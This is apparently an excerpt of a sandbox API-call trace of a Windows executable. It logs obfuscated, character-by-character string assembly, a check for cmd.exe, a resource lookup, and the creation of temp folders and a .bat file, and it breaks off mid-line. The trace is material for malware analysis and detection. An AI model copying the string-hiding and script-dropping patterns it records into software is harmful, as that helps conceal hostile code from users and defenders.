[0082.738] GetLastError () returned 0x0 [0082.738] SetLastError (dwErrCode=0x0) [0082.738] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.738] GetLastError () returned 0x0 [0082.738] SetLastError (dwErrCode=0x0) [0082.738] wcslen (_String="b2ein") returned 0x5 [0082.738] wcslen (_String="c") returned 0x1 [0082.738] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410500, Size=0x16) returned 0x2410500 [0082.738] GetLastError () returned 0x0 [0082.738] SetLastError (dwErrCode=0x0) [0082.738] GetLastError () returned 0x0 [0082.738] SetLastError (dwErrCode=0x0) [0082.738] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.738] GetLastError () returned 0x0 [0082.738] SetLastError (dwErrCode=0x0) [0082.738] wcslen (_String="b2einc") returned 0x6 [0082.739] wcslen (_String="f") returned 0x1 [0082.739] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410500, Size=0x18) returned 0x2410500 [0082.739] GetLastError () returned 0x0 [0082.739] SetLastError (dwErrCode=0x0) [0082.739] GetLastError () returned 0x0 [0082.739] SetLastError (dwErrCode=0x0) [0082.739] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.739] GetLastError () returned 0x0 [0082.739] SetLastError (dwErrCode=0x0) [0082.739] wcslen (_String="b2eincf") returned 0x7 [0082.739] wcslen (_String="i") returned 0x1 [0082.740] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410500, Size=0x1a) returned 0x2410500 [0082.740] GetLastError () returned 0x0 [0082.740] SetLastError (dwErrCode=0x0) [0082.740] GetLastError () returned 0x0 [0082.740] SetLastError (dwErrCode=0x0) [0082.740] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.740] GetLastError () returned 0x0 [0082.740] SetLastError (dwErrCode=0x0) [0082.740] wcslen (_String="b2eincfi") returned 0x8 [0082.740] wcslen (_String="l") returned 0x1 [0082.740] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410500, Size=0x1c) returned 0x2410500 [0082.740] GetLastError () returned 0x0 [0082.740] SetLastError (dwErrCode=0x0) [0082.740] GetLastError () returned 0x0 [0082.740] SetLastError (dwErrCode=0x0) [0082.741] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.741] GetLastError () returned 0x0 [0082.741] SetLastError (dwErrCode=0x0) [0082.741] wcslen (_String="b2eincfil") returned 0x9 [0082.741] wcslen (_String="e") returned 0x1 [0082.741] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410500, Size=0x1e) returned 0x2410500 [0082.741] GetLastError () returned 0x0 [0082.741] SetLastError (dwErrCode=0x0) [0082.741] GetLastError () returned 0x0 [0082.741] SetLastError (dwErrCode=0x0) [0082.741] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.741] GetLastError () returned 0x0 [0082.741] SetLastError (dwErrCode=0x0) [0082.741] wcslen (_String="E") returned 0x1 [0082.741] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2417768 [0082.741] GetLastError () returned 0x0 [0082.741] SetLastError (dwErrCode=0x0) [0082.741] GetLastError () returned 0x0 [0082.742] SetLastError (dwErrCode=0x0) [0082.742] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.742] GetLastError () returned 0x0 [0082.742] SetLastError (dwErrCode=0x0) [0082.742] wcslen (_String="E") returned 0x1 [0082.742] wcslen (_String="r") returned 0x1 [0082.742] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xe) returned 0x24177c8 [0082.742] GetLastError () returned 0x0 [0082.742] SetLastError (dwErrCode=0x0) [0082.742] GetLastError () returned 0x0 [0082.742] SetLastError (dwErrCode=0x0) [0082.742] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.742] GetLastError () returned 0x0 [0082.742] SetLastError (dwErrCode=0x0) [0082.742] wcslen (_String="Er") returned 0x2 [0082.742] wcslen (_String="r") returned 0x1 [0082.742] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177c8, Size=0x10) returned 0x24177b0 [0082.742] GetLastError () returned 0x0 [0082.742] SetLastError (dwErrCode=0x0) [0082.742] GetLastError () returned 0x0 [0082.743] SetLastError (dwErrCode=0x0) [0082.743] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.743] GetLastError () returned 0x0 [0082.743] SetLastError (dwErrCode=0x0) [0082.743] wcslen (_String="Err") returned 0x3 [0082.743] wcslen (_String="o") returned 0x1 [0082.743] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177b0, Size=0x12) returned 0x2417ef0 [0082.743] GetLastError () returned 0x0 [0082.743] SetLastError (dwErrCode=0x0) [0082.743] GetLastError () returned 0x0 [0082.743] SetLastError (dwErrCode=0x0) [0082.744] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.744] GetLastError () returned 0x0 [0082.744] SetLastError (dwErrCode=0x0) [0082.744] wcslen (_String="Erro") returned 0x4 [0082.744] wcslen (_String="r") returned 0x1 [0082.744] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417ef0, Size=0x14) returned 0x2417f90 [0082.744] GetLastError () returned 0x0 [0082.744] SetLastError (dwErrCode=0x0) [0082.744] GetLastError () returned 0x0 [0082.744] SetLastError (dwErrCode=0x0) [0082.744] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.744] GetLastError () returned 0x0 [0082.744] SetLastError (dwErrCode=0x0) [0082.744] wcslen (_String="e") returned 0x1 [0082.744] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24176c0 [0082.744] GetLastError () returned 0x0 [0082.744] SetLastError (dwErrCode=0x0) [0082.744] GetLastError () returned 0x0 [0082.744] SetLastError (dwErrCode=0x0) [0082.745] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.745] GetLastError () returned 0x0 [0082.745] SetLastError (dwErrCode=0x0) [0082.745] wcslen (_String="e") returned 0x1 [0082.745] wcslen (_String="x") returned 0x1 [0082.745] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176c0, Size=0xe) returned 0x2417720 [0082.745] GetLastError () returned 0x0 [0082.745] SetLastError (dwErrCode=0x0) [0082.745] GetLastError () returned 0x0 [0082.745] SetLastError (dwErrCode=0x0) [0082.745] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.745] GetLastError () returned 0x0 [0082.745] SetLastError (dwErrCode=0x0) [0082.745] wcslen (_String="ex") returned 0x2 [0082.745] wcslen (_String="t") returned 0x1 [0082.745] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417720, Size=0x10) returned 0x24177e0 [0082.745] GetLastError () returned 0x0 [0082.745] SetLastError (dwErrCode=0x0) [0082.746] GetLastError () returned 0x0 [0082.746] SetLastError (dwErrCode=0x0) [0082.746] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.746] GetLastError () returned 0x0 [0082.746] SetLastError (dwErrCode=0x0) [0082.746] wcslen (_String="ext") returned 0x3 [0082.746] wcslen (_String="d") returned 0x1 [0082.746] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177e0, Size=0x12) returned 0x2417fb0 [0082.746] wcslen (_String="extd") returned 0x4 [0082.746] wcslen (_String=".exe") returned 0x4 [0082.746] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417fb0, Size=0x1a) returned 0x2410528 [0082.746] wcslen (_String="cmd") returned 0x3 [0082.746] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x10) returned 0x2417780 [0082.746] wcslen (_String=".exe") returned 0x4 [0082.746] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x12) returned 0x2417db0 [0082.746] GetNativeSystemInfo (in: lpSystemInfo=0x19fee4 | out: lpSystemInfo=0x19fee4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0082.746] GetVersionExW (in: lpVersionInformation=0x19fbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x1e0000, dwMinorVersion=0xea0001eb, dwBuildNumber=0x10, dwPlatformId=0x6a, szCSDVersion="衢횥\x05") | out: lpVersionInformation=0x19fbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0082.747] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77970000 [0082.747] GetProcAddress (hModule=0x77970000, lpProcName="RtlGetVersion") returned 0x7799fff0 [0082.747] RtlGetVersion (in: lpVersionInformation=0x19fcd4 | out: lpVersionInformation=0x19fcd4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0082.747] GetLastError () returned 0x0 [0082.747] SetLastError (dwErrCode=0x0) [0082.747] GetLastError () returned 0x0 [0082.747] SetLastError (dwErrCode=0x0) [0082.747] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x100a) returned 0x2418090 [0082.748] GetWindowsDirectoryW (in: lpBuffer=0x2418090, uSize=0x800 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0082.748] PathAddBackslashW (in: pszPath="C:\\WINDOWS" | out: pszPath="C:\\WINDOWS\\") returned="" [0082.748] GetLastError () returned 0x0 [0082.748] SetLastError (dwErrCode=0x0) [0082.748] wcslen (_String="C:\\WINDOWS\\") returned 0xb [0082.748] wcslen (_String="sysnative") returned 0x9 [0082.749] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418090, Size=0x32) returned 0x2418090 [0082.749] PathAddBackslashW (in: pszPath="C:\\WINDOWS\\sysnative" | out: pszPath="C:\\WINDOWS\\sysnative\\") returned="" [0082.749] GetLastError () returned 0x0 [0082.749] SetLastError (dwErrCode=0x0) [0082.749] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0082.749] wcslen (_String="cmd") returned 0x3 [0082.749] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x3a) returned 0x2410550 [0082.749] GetLastError () returned 0x0 [0082.749] SetLastError (dwErrCode=0x0) [0082.749] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0082.749] wcslen (_String="cmd") returned 0x3 [0082.749] wcslen (_String=".exe") returned 0x4 [0082.749] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x42) returned 0x24180d0 [0082.749] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x8, Size=0x20) returned 0x22b1088 [0082.749] CreateFileW (lpFileName="C:\\WINDOWS\\sysnative\\cmd" (normalized: "c:\\windows\\sysnative\\cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.750] CreateFileW (lpFileName="C:\\WINDOWS\\sysnative\\cmd.exe" (normalized: "c:\\windows\\sysnative\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0082.787] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x1000) returned 0x22b10b0 [0082.788] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.788] CloseHandle (hObject=0x210) returned 1 [0082.788] GetLastError () returned 0x0 [0082.788] SetLastError (dwErrCode=0x0) [0082.788] wcslen (_String="C:\\WINDOWS\\sysnative\\") returned 0x15 [0082.788] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24180d0 | out: hHeap=0x2410000) returned 1 [0082.788] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417780 | out: hHeap=0x2410000) returned 1 [0082.788] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417db0 | out: hHeap=0x2410000) returned 1 [0082.789] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418090 | out: hHeap=0x2410000) returned 1 [0082.789] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2410550 | out: hHeap=0x2410000) returned 1 [0082.789] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x34) returned 0x2410550 [0082.789] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\" " [0082.789] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0082.789] GetLastError () returned 0x0 [0082.789] SetLastError (dwErrCode=0x0) [0082.789] GetLastError () returned 0x0 [0082.789] SetLastError (dwErrCode=0x0) [0082.789] GetLastError () returned 0x0 [0082.789] SetLastError (dwErrCode=0x0) [0082.789] GetLastError () returned 0x0 [0082.790] SetLastError (dwErrCode=0x0) [0082.790] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b10b0 [0082.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.790] malloc (_Size=0x22) returned 0x9b1150 [0082.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="078EFDA905BE29D2B2220056D808BDE2", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="078EFDA905BE29D2B2220056D808BDE2", lpUsedDefaultChar=0x0) returned 33 [0082.790] free (_Block=0x9b1150) [0082.790] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2418090 [0082.790] GetLastError () returned 0x0 [0082.790] SetLastError (dwErrCode=0x0) [0082.790] GetLastError () returned 0x0 [0082.790] SetLastError (dwErrCode=0x0) [0082.791] GetLastError () returned 0x0 [0082.791] SetLastError (dwErrCode=0x0) [0082.791] GetLastError () returned 0x0 [0082.791] SetLastError (dwErrCode=0x0) [0082.791] RtlAllocateHeap (HeapHandle=0x22b0000, Flags=0x0, Size=0x9c) returned 0x22b10b0 [0082.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="81093E257A0DDDDC4ED186E0A1616949", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0082.791] malloc (_Size=0x22) returned 0x9b1150 [0082.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="81093E257A0DDDDC4ED186E0A1616949", cchWideChar=33, lpMultiByteStr=0x9b1150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="81093E257A0DDDDC4ED186E0A1616949", lpUsedDefaultChar=0x0) returned 33 [0082.791] free (_Block=0x9b1150) [0082.791] HeapFree (in: hHeap=0x22b0000, dwFlags=0x0, lpMem=0x22b10b0 | out: hHeap=0x22b0000) returned 1 [0082.792] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2418090, Size=0x4a) returned 0x2418090 [0082.792] wcslen (_String="4DE237AD17CDF9EA9D31BEEBC81890A8") returned 0x20 [0082.792] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x4a) returned 0x2418218 [0082.792] FindResourceW (hModule=0x400000, lpName="4DE237AD17CDF9EA9D31BEEBC81890A8", lpType=0xa) returned 0x4192f0 [0082.792] LoadResource (hModule=0x400000, hResInfo=0x4192f0) returned 0x443888 [0082.792] SizeofResource (hModule=0x400000, hResInfo=0x4192f0) returned 0xe [0082.792] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0xe) returned 0x9005a8 [0082.792] FreeResource (hResData=0x443888) returned 0 [0082.792] RtlSizeHeap (HeapHandle=0x900000, Flags=0x0, MemoryPointer=0x9005a8) returned 0xe [0082.792] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x200) returned 0x9005c0 [0082.792] malloc (_Size=0x1bd0) returned 0x9b24f0 [0082.792] free (_Block=0x9b24f0) [0082.793] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418218 | out: hHeap=0x2410000) returned 1 [0082.793] GetLastError () returned 0x0 [0082.793] SetLastError (dwErrCode=0x0) [0082.793] GetLastError () returned 0x0 [0082.793] SetLastError (dwErrCode=0x0) [0082.793] GetLastError () returned 0x0 [0082.793] SetLastError (dwErrCode=0x0) [0082.793] GetLastError () returned 0x0 [0082.793] SetLastError (dwErrCode=0x0) [0082.793] GetLastError () returned 0x0 [0082.793] SetLastError (dwErrCode=0x0) [0082.793] GetLastError () returned 0x0 [0082.793] SetLastError (dwErrCode=0x0) [0082.794] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2417768 [0082.794] GetLastError () returned 0x0 [0082.794] SetLastError (dwErrCode=0x0) [0082.794] wcslen (_String=".") returned 0x1 [0082.794] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2417798 [0082.794] GetLastError () returned 0x0 [0082.794] SetLastError (dwErrCode=0x0) [0082.794] GetLastError () returned 0x0 [0082.794] SetLastError (dwErrCode=0x0) [0082.794] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0xc) returned 0x2417720 [0082.794] GetLastError () returned 0x0 [0082.794] SetLastError (dwErrCode=0x0) [0082.794] wcslen (_String=".") returned 0x1 [0082.795] wcslen (_String="b") returned 0x1 [0082.795] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417798, Size=0xe) returned 0x2417768 [0082.795] GetLastError () returned 0x0 [0082.795] SetLastError (dwErrCode=0x0) [0082.795] GetLastError () returned 0x0 [0082.795] SetLastError (dwErrCode=0x0) [0082.795] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417720, Size=0xc) returned 0x2417858 [0082.795] GetLastError () returned 0x0 [0082.795] SetLastError (dwErrCode=0x0) [0082.795] wcslen (_String=".b") returned 0x2 [0082.795] wcslen (_String="a") returned 0x1 [0082.795] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417768, Size=0x10) returned 0x2417738 [0082.795] GetLastError () returned 0x0 [0082.796] SetLastError (dwErrCode=0x0) [0082.796] GetLastError () returned 0x0 [0082.796] SetLastError (dwErrCode=0x0) [0082.796] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417858, Size=0xc) returned 0x24177f8 [0082.796] GetLastError () returned 0x0 [0082.796] SetLastError (dwErrCode=0x0) [0082.796] wcslen (_String=".ba") returned 0x3 [0082.796] wcslen (_String="t") returned 0x1 [0082.796] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417738, Size=0x12) returned 0x2417eb0 [0082.796] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x8, Size=0x400) returned 0x9007c8 [0082.796] GetLastError () returned 0x0 [0082.796] SetLastError (dwErrCode=0x0) [0082.796] GetLastError () returned 0x0 [0082.796] SetLastError (dwErrCode=0x0) [0082.796] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x2410608 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0082.796] LoadLibraryW (lpLibFileName="Kernel32.DLL") returned 0x772d0000 [0082.797] GetProcAddress (hModule=0x772d0000, lpProcName="GetLongPathNameW") returned 0x77311710 [0082.797] GetLongPathNameW (in: lpszShortPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpszLongPath=0x2410608, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0082.799] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x50) returned 0x2418218 [0082.799] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x9007c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp")) returned 0xac92 [0082.804] GetLastError () returned 0x0 [0082.804] SetLastError (dwErrCode=0x0) [0082.804] GetLastError () returned 0x0 [0082.804] SetLastError (dwErrCode=0x0) [0082.804] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x60) returned 0x24188f0 [0082.804] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp")) returned 1 [0082.805] wcsncpy (in: _Dest=0x19fd08, _Source="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp", _Count=0x104 | out: _Dest="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp" [0082.805] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp") returned 0x2b [0082.805] CreateDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp"), lpSecurityAttributes=0x0) returned 1 [0082.806] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp", lpPrefixString="", uUnique=0x0, lpTempFileName=0x9007c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp")) returned 0xaca2 [0082.806] GetLastError () returned 0x0 [0082.807] SetLastError (dwErrCode=0x0) [0082.807] GetLastError () returned 0x0 [0082.807] SetLastError (dwErrCode=0x0) [0082.807] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x72) returned 0x2418958 [0082.807] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp")) returned 1 [0082.807] wcsncpy (in: _Dest=0x19fd08, _Source="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp", _Count=0x104 | out: _Dest="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp" [0082.807] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp") returned 0x34 [0082.808] CreateDirectoryW (lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp"), lpSecurityAttributes=0x0) returned 1 [0082.808] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp", lpPrefixString="", uUnique=0x0, lpTempFileName=0x9007c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.tmp")) returned 0xaca3 [0082.808] PathAddBackslashW (in: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp" | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\") returned="" [0082.809] GetLastError () returned 0x0 [0082.809] SetLastError (dwErrCode=0x0) [0082.809] GetLastError () returned 0x0 [0082.809] SetLastError (dwErrCode=0x0) [0082.809] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x24189d8 [0082.809] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.tmp")) returned 1 [0082.810] PathRenameExtensionW (in: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.tmp", pszExt=".bat" | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 1 [0082.810] GetTempFileNameW (in: lpPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x9007c8 | out: lpTempFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA4.tmp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca4.tmp")) returned 0xaca4 [0082.810] GetLastError () returned 0x0 [0082.811] SetLastError (dwErrCode=0x0) [0082.811] GetLastError () returned 0x0 [0082.811] SetLastError (dwErrCode=0x0) [0082.811] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0x84) returned 0x2418a68 [0082.811] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9007c8 | out: hHeap=0x900000) returned 1 [0082.811] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2418218 | out: hHeap=0x2410000) returned 1 [0082.811] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x24177f8 | out: hHeap=0x2410000) returned 1 [0082.811] HeapFree (in: hHeap=0x2410000, dwFlags=0x0, lpMem=0x2417eb0 | out: hHeap=0x2410000) returned 1 [0082.811] GetLastError () returned 0x0 [0082.811] SetLastError (dwErrCode=0x0) [0082.811] GetLastError () returned 0x0 [0082.811] SetLastError (dwErrCode=0x0) [0082.811] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2417708 [0082.812] GetLastError () returned 0x0 [0082.812] SetLastError (dwErrCode=0x0) [0082.812] wcslen (_String="S") returned 0x1 [0082.812] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24177e0 [0082.812] GetLastError () returned 0x0 [0082.812] SetLastError (dwErrCode=0x0) [0082.812] GetLastError () returned 0x0 [0082.812] SetLastError (dwErrCode=0x0) [0082.812] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417708, Size=0xc) returned 0x2417738 [0082.812] GetLastError () returned 0x0 [0082.812] SetLastError (dwErrCode=0x0) [0082.812] wcslen (_String="S") returned 0x1 [0082.812] wcslen (_String="e") returned 0x1 [0082.813] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177e0, Size=0xe) returned 0x2417750 [0082.813] GetLastError () returned 0x0 [0082.813] SetLastError (dwErrCode=0x0) [0082.813] GetLastError () returned 0x0 [0082.813] SetLastError (dwErrCode=0x0) [0082.813] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417738, Size=0xc) returned 0x24177c8 [0082.813] GetLastError () returned 0x0 [0082.813] SetLastError (dwErrCode=0x0) [0082.813] wcslen (_String="Se") returned 0x2 [0082.813] wcslen (_String="l") returned 0x1 [0082.813] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417750, Size=0x10) returned 